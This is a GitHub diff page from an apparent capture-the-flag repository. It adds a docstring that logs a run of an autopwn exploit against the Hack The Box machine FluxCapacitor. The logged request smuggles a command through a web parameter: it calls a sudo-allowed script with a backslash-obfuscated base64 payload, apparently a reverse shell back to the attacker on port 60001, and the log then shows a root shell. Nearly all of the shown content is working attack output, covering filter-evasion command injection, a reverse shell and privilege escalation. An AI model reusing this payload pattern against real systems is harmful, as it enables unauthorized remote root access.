File tree Expand file tree Collapse file tree 1 file changed +13
-0
lines changed
hacking/HTB/FluxCapacitor Expand file tree Collapse file tree 1 file changed +13
-0
lines changed Original file line number Diff line number Diff line change @@ -45,3 +45,16 @@ def send_shell_payload():
45
45
sys .exit ()
46
46
shell .interactive ()
47
47
sys .exit ()
48
+
49
+ '''
50
+ $ python2 autopwn_flux.py
51
+ [*] http://10.10.10.69:80/sync?opt=' sudo /home/themiddle/.monit cmd L\3 \V\z\c\i\9 \i\a \W\4 \v \c\H\l\0 \a \G\9 \u\M\y\A\t \Y\y\A\i\a \W\1 \w\b \3 \J\0 \I\G\9 \z\L\H\B\0 \e\S\x\z\b \2 \N\r \Z\X\Q\7 \c\z\1 \z\b \2 \N\r \Z\X\Q\u\c\2 \9 \j\a \2 \V\0 \K\H\N\v \Y\2 \t \l\d\C\5 \B\R\l\9 \J\T\k\V\U\L\H\N\v \Y\2 \t \l\d\C\5 \T\T\0 \N\L\X\1 \N\U\U\k\V\B\T\S\k\7 \c\y\5 \j\b \2 \5 \u\Z\W\N\0 \K\C\g\n \M\T\A\u\M\T\A\u\M\T\Q\u\N\D\M\n \L\D\Y\w\M\D\A\x\K\S\k\7 \b \3 \M\u\Z\H\V\w\M\i\h\z\L\m\Z\p\b \G\V\u\b \y\g\p\L\D\A\p\O\2 \9 \z\L\m\R\1 \c\D\I\o\c\y\5 \m\a \W\x\l\b \m\8 \o\K\S\w\x\K\T\t \v \c\y\5 \k\d\X\A\y\K\H\M\u\Z\m\l\s\Z\W\5 \v \K\C\k\s\M\i\k\7 \b \3 \M\u\c\H\V\0 \Z\W\5 \2 \K\C\d\I\S\V\N\U\R\k\l\M\R\S\c\s\J\y\9 \k\Z\X\Y\v \b \n \V\s\b \C\c\p\O\3 \B\0 \e\S\5 \z\c\G\F\3 \b \i\h\b \J\y\9 \i\a \W\4 \v \Y\m\F\z\a \C\c\s\J\y\1 \p\J\1 \0 \p\O\3 \M\u\Y\2 \x\v \c\2 \U\o\K\T\t \l\e\G\l\0 \K\C\k\7 \I\g\=\='
52
+ [+] Trying to bind to 0.0.0.0 on port 60001: Done
53
+ [*] I am sending the encoded payload for you...
54
+ [+] Waiting for connections on 0.0.0.0:60001: Got connection from 10.10.10.69 on port 49114
55
+ [*] Switching to interactive mode
56
+ root@fluxcapacitor:/# $ whoami
57
+ whoami
58
+ root
59
+ root@fluxcapacitor:/# $
60
+ '''
You can’t perform that action at this time.
0 commit comments